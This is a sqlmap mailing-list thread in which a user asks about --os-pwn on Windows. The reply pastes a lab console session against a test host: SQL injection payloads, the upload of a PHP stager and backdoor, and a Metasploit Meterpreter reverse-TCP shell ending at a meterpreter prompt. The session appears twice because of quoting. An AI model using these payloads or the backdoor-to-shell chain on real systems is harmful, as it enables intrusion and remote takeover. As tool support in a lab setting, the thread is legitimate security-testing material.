>     Type: AND/OR time-based blind
>     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
>     Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)
>
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 3 columns
>     Payload: id=1 UNION ALL SELECT
> NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
> epjZ
> ---
> [09:11:45] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL 5.0
> [09:11:45] [INFO] fingerprinting the back-end DBMS operating system
> [09:11:45] [INFO] the back-end DBMS operating system is Windows
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> >
> [09:11:46] [INFO] going to use a web backdoor to establish the tunnel
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] JSP
> [4] PHP (default)
> >
> [09:11:47] [WARNING] unable to retrieve automatically the web server
> document root
> what do you want to use for writable directory?
> [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
> [2] custom location(s)
> [3] custom directory list file
> [4] brute force search
> > 1
> [09:12:02] [WARNING] unable to automatically parse any web server path
> [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
> LIMIT 'LINES TERMINATED BY' method
> [09:12:02] [INFO] the file stager has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
> [09:12:02] [INFO] the backdoor has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
> [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine
> (default)
> [2] Reverse TCP: Try to connect back from the database host to this
> machine, on all ports between the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine
> tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine
> tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> >
> what is the local address? [Enter for '192.168.146.1' (detected)]
> which local port number do you want to use? [59643]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> >
> [09:12:04] [INFO] creation in progress ..... done
> [09:12:09] [INFO] uploading shellcodeexec to
> 'C:/Windows/Temp/tmpsehply.exe'
> [09:12:09] [INFO] shellcodeexec successfully uploaded
> [09:12:09] [INFO] running Metasploit Framework command line interface
> locally, please wait..
>
>
>  ______________________________________________________________________________
> |
>      |
> |                   METASPLOIT CYBER MISSILE COMMAND V4
>      |
>
> |______________________________________________________________________________|
>       \                                  /                      /
>        \     .                          /                      /
>  x
>         \                              /                      /
>          \                            /          +           /
>           \            +             /                      /
>            *                        /                      /
>                                    /      .               /
>     X                             /                      /            X
>                                  /                     ###
>                                 /                     # % #
>                                /                       ###
>                       .       /
>      .                       /      .            *           .
>                             /
>                            *
>                   +                       *
>
>                                        ^
> ####      __     __     __          #######         __     __     __
>  ####
> ####    /    \ /    \ /    \      ###########     /    \ /    \ /    \
>  ####
>
> ################################################################################
>
> ################################################################################
> # WAVE 4 ######## SCORE 31337 ################################## HIGH
> FFFFFFFF #
>
> ################################################################################
>
> http://metasploit.pro
>
>
>        =[ metasploit v4.11.8-dev-a030179                  ]
> + -- --=[ 1527 exploits - 880 auxiliary - 259 post        ]
> + -- --=[ 437 payloads - 38 encoders - 8 nops             ]
> + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
>
> PAYLOAD => windows/meterpreter/reverse_tcp
> EXITFUNC => process
> LPORT => 59643
> LHOST => 192.168.146.1
> [*] Started reverse TCP handler on 192.168.146.1:59643
> [*] Starting the payload handler...
> [09:12:18] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [09:12:23] [WARNING] turning off pre-connect mechanism because of
> connection time out(s)
> [*] Sending stage (957487 bytes) to 192.168.146.132
>
> meterpreter >
>
>
> On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...>
> wrote:
>
>> hi all,
>>
>> i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA
>> windows machine"
>>
>> i got an error
>>
>> [WARNING] unable to upload the file through the web file stager to '/tmp'
>>
>> i wonder is it only avaliable for linux OS ?
>>
>> thanks
>> Indra Z
>>
>> --
>> --from the net with zero space--
>>
>>
>> ------------------------------------------------------------------------------
>> Find and fix application performance issues faster with Applications
>> Manager
>> Applications Manager provides deep performance insights into multiple
>> tiers of
>> your business applications. It resolves application problems quickly and
>> reduces your MTTR. Get your free trial!
>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] mysql os-pwn options on windows

[Miroslav S. <mir...@gm...>]

$ sudo python sqlmap.py -u "
http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
[sudo] password for stamparm:
         _
 ___ ___| |_____ ___ ___  {1.0.4.21#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 09:11:45

[09:11:45] [WARNING] you did not provide the local path where Metasploit
Framework is installed
[09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
installation inside the environment path(s)
[09:11:45] [INFO] Metasploit Framework has been found installed in the
'/usr/bin' path
[09:11:45] [INFO] resuming back-end DBMS 'mysql'
[09:11:45] [INFO] testing connection to the target URL
[09:11:45] [INFO] heuristics detected web page charset 'ascii'
[09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2546=2546

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
    Payload: id=1 AND (SELECT 8079 FROM(SELECT
COUNT(*),CONCAT(0x7178767071,(SELECT
(ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT
NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
epjZ
---
[09:11:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[09:11:45] [INFO] fingerprinting the back-end DBMS operating system
[09:11:45] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[09:11:46] [INFO] going to use a web backdoor to establish the tunnel
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[09:11:47] [WARNING] unable to retrieve automatically the web server
document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[09:12:02] [WARNING] unable to automatically parse any web server path
[09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
LIMIT 'LINES TERMINATED BY' method
[09:12:02] [INFO] the file stager has been successfully uploaded on
'/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
[09:12:02] [INFO] the backdoor has been successfully uploaded on
'/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
[09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine
(default)
[2] Reverse TCP: Try to connect back from the database host to this
machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine
tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine
tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
>
what is the local address? [Enter for '192.168.146.1' (detected)]
which local port number do you want to use? [59643]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[09:12:04] [INFO] creation in progress ..... done
[09:12:09] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsehply.exe'
[09:12:09] [INFO] shellcodeexec successfully uploaded
[09:12:09] [INFO] running Metasploit Framework command line interface
locally, please wait..

 ______________________________________________________________________________
|
   |
|                   METASPLOIT CYBER MISSILE COMMAND V4
   |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /
 x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __
 ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \
 ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH
FFFFFFFF #
################################################################################

http://metasploit.pro


       =[ metasploit v4.11.8-dev-a030179                  ]
+ -- --=[ 1527 exploits - 880 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 59643
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:59643
[*] Starting the payload handler...
[09:12:18] [INFO] running Metasploit Framework shellcode remotely via
shellcodeexec, please wait..
[09:12:23] [WARNING] turning off pre-connect mechanism because of
connection time out(s)
[*] Sending stage (957487 bytes) to 192.168.146.132

meterpreter >


On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...>
wrote:

> hi all,
>
> i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA
> windows machine"
>
> i got an error
>
> [WARNING] unable to upload the file through the web file stager to '/tmp'
>
> i wonder is it only avaliable for linux OS ?
>
> thanks
> Indra Z
>
> --
> --from the net with zero space--
>
>
> ------------------------------------------------------------------------------
> Find and fix application performance issues faster with Applications
> Manager
> Applications Manager provides deep performance insights into multiple
> tiers of
> your business applications. It resolves application problems quickly and
> reduces your MTTR. Get your free trial!
> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm